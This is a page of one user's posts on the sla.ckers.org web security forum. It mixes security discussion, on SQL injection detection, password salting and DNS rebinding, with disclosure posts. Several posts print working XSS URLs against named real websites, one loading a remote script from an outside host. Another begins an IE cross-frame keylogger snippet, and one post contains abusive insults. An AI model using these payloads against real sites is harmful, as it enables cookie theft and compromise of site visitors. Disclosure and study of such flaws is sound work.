Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Pages: 12345...LastNext
Current Page: 1 of 11
Results 1 - 30 of 307
4 years ago
digi7al64
Gareth Heyes Wrote: ------------------------------------------------------- > I'm going to unveil a new technique developed by > me to hack webapps and sites. Now I'm presenting a > technique which can be subcategorized under the > tree of IPP injection, The "IP ON U - Injection". > It involves a spray attack. Bad news Gareth :( RKelly was the first to use th
Forum: News and Links
4 years ago
digi7al64
nvm
Forum: Full Disclosure
4 years ago
digi7al64
for the win http://samples.msdn.microsoft.com/ietestcenter/frame_holder.htm?url=javascript:alert%28%27xss%27%29;
Forum: Full Disclosure
4 years ago
digi7al64
This was discovered when the forums first come online. http://sla.ckers.org/forum/read.php?10,1031 You should be alright as long as no one is running tracking images in their sigs (which i think is disallowed)
Forum: Bugs
4 years ago
digi7al64
wow - thats look identical to something i wrote for a bank...
Forum: Projects
4 years ago
digi7al64
Another news.com.au one - the error message they give you is the best... disallowed characters.... which are unescaped. fail http://blogs.news.com.au/techblog/index.php/?moo%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E;%27
Forum: Full Disclosure
4 years ago
digi7al64
http://javascript.about.com/gi/dynamic/offsite.htm?site=javascript:alert%28document.cookie%29;
Forum: Full Disclosure
7 years ago
digi7al64
homfg - I RULZ <body onload='vbscript:msgbox "moo"' you may pay me in women or gold... or women covered in gold.
Forum: Projects
5 years ago
digi7al64
New ZFO is out http://www.milw0rm.org/papers/360 Looks like they got Ronald Edit: And image shack wasn't them either... but given the role call of ownage in the latest zine it looks like they are deeper into internets then anyone had thought (and possible more skilled up then ever before).
Forum: News and Links
5 years ago
digi7al64
what type of forum software are we talking about? Does it need to defeat captchas? Are their nuances? Will it be vulnerable to xss?
Forum: News and Links
5 years ago
digi7al64
Its the same people behind project mayhem (hono) thats been around for ever and the latest hackthissite zine has a message from their "blackhat overlords" which outlines the exact same argument/message from the same anti-sec movement which is kinda lame since it doesn't make it all that hard to figure out who is doing it and has been doing it. So, the sites they will own with either
Forum: News and Links
5 years ago
digi7al64
kuza55 Wrote: ------------------------------------------------------- > digi7al64 Wrote: > -------------------------------------------------- > ----- > > I hope you die in a fire you pathetic spamming > > piece of shit. > > > > WE NEED NOFOLLOW ATTRIBUTES ON ALL LINKS HERE. > > > So hacking systems is perfectly alright, but > spammers are
Forum: News and Links
5 years ago
digi7al64
I hope you die in a fire you pathetic spamming piece of shit. WE NEED NOFOLLOW ATTRIBUTES ON ALL LINKS HERE.
Forum: News and Links
5 years ago
digi7al64
http://search.news.com.au/search?q=%3C%2Ftitle%3E%3Cscript+src%3D%27http%3A%2F%2Fha.ckers.org%2Fs.js%27%3E%3C%2Fscript%3E&sid=5001021&us=ndmdailytelegraph&as=NEWS.HOME&ac=DTM
Forum: Full Disclosure
5 years ago
digi7al64
nice work.
Forum: Full Disclosure
5 years ago
digi7al64
http://blogs.news.com.au/horeyandson/index.php/newscore/comments_form_thread/are_you_getting_the_bandwidth_you_want/1047767/moo?%22%3Cscript%3Ealert(%27xss%27);%3C/script%3E
Forum: Full Disclosure
5 years ago
digi7al64
yes
Forum: Full Disclosure
5 years ago
digi7al64
rvdh Wrote: ------------------------------------------------------- > The point was made only on a script that was > properly secured already, not on a script that was > flawed from the start. So there are two ways to go > about this, if you already write secure code you > could suffice with both, if you don't an extra > check is needed to notice an injection or > coll
Forum: Projects
5 years ago
digi7al64
@wireghoul I know its better to prevent injection in the first place rather then try to stop it after. What I am suggesting is adding an extra check in the code to ensure only 1 record was returned from the query. Its basically a 2 liner which helps to assist in identifying if an injection occurred (which as you and I previously pointed out can be defeated).
Forum: Projects
5 years ago
digi7al64
@backbone The game in continuing evolving and its better to be proactive in detection rather then reactive to an attack. Also, its VERY important to note that we aren't processing data around the main function. The code I provided performed an extra check on the recordset to ensure the rowcount was equal to 1. That it is.
Forum: Projects
5 years ago
digi7al64
I understood the issue perfectly. My problem is that rather then the system confirming only 1 record is returned from the query (by checking the number of rows returned) you force it to return only 1 row with the limit statement. Hence, if i was to undertake an attack that bypassed the input sanitizing routine you wouldn't have a clue if 100 records or 1 record was returned. Thus you can't det
Forum: Projects
5 years ago
digi7al64
Why hash a salt and then concat it to another string? From a brute force perspective it is easier to brute force (assuming we had access to the database) $encoded = sha1($pass.$name.$key).2fd4e1c6 7a2d28fc ed849ee1 bb76e739 1b93eb12 then it is this $encoded = sha1($pass.$name.$key.!23g^gdd z!g0(-gc fd8#9&ez1 5$rtb76$9 1b!-Zeb12) The second example is much better as the actual string to
Forum: Projects
5 years ago
digi7al64
t Wrote: ------------------------------------------------------- > was playing around with url= > > hxxps://blackboard.uoregon.edu/webapps/login/?new_ > loc="> > > its neat, but i tried to escape so I could script > but had no luck... is possible? blackboard has so many xss (persistent and reflective) vuns in it its not funny. We spent an afternoon on it o
Forum: Full Disclosure
5 years ago
digi7al64
I am only guessing the DDoS is only part of it. As he said this whole industry is based around a small number of people who really think they are the ducks guts when compared to everyone else and as such those not inside the click are generally treated like shit, so why bother.
Forum: OMG Ponies
6 years ago
digi7al64
kuza55 Wrote: ------------------------------------------------------- > Umm, I don't know about you, but I'd throw this in > the "don't really care" bucket. > > Sure, you can get their keystrokes across-domain, > hell there's a more useful variant where after you > inject and iframe, you can then keep stealing > focus to get keystrokes, however, in the examp
Forum: News and Links
6 years ago
digi7al64
After much debate with a vulnerability assessor in regards to the same domain policy (and the fact I believed it couldn't be bypassed with modern browsers barring an 0 day) I was presented with a link to following script. <html> <head> <title>IE Cross Frame Scripting Restriction Bypass Example</title> <script> var keylog=''; document.onkeypress = function () {
Forum: News and Links
6 years ago
digi7al64
I mucked around a bit with this and couldn't find anything. Interestingly though when the following code is executed (onclick) Chrome appears to automatically close the alert box for you. <iframe src="" id="c"></iframe> <input type="button" onclick="document.getElementById('c').src='javascript:alert(1);';" value="iof"/>
Forum: Full Disclosure
6 years ago
digi7al64
@lpilorz - thanks for that. I will test it out tonight. Also, In a lot of the recently written material I have read about DNS rebinding is appears that it seems to only work in attacking internal networks (as with your PoC). Is this correct or can you use the attack against sites on the internet as well?
Forum: Projects
6 years ago
digi7al64
Chrome Vulnerabilities This is a site of a friend of mine. Plans are afoot to record all bugs/spoilts for Google Chrome so if you hear of any then hit you can let him know via email at chromekb...gmail
Forum: News and Links
6 years ago
digi7al64
Thanks for the info. I guess this is something that can't be patched easily other then forcing the ttl value to be a force locked for the entire active session (which is going to create problems anyways).
Forum: Projects
Pages: 12345...LastNext
Current Page: 1 of 11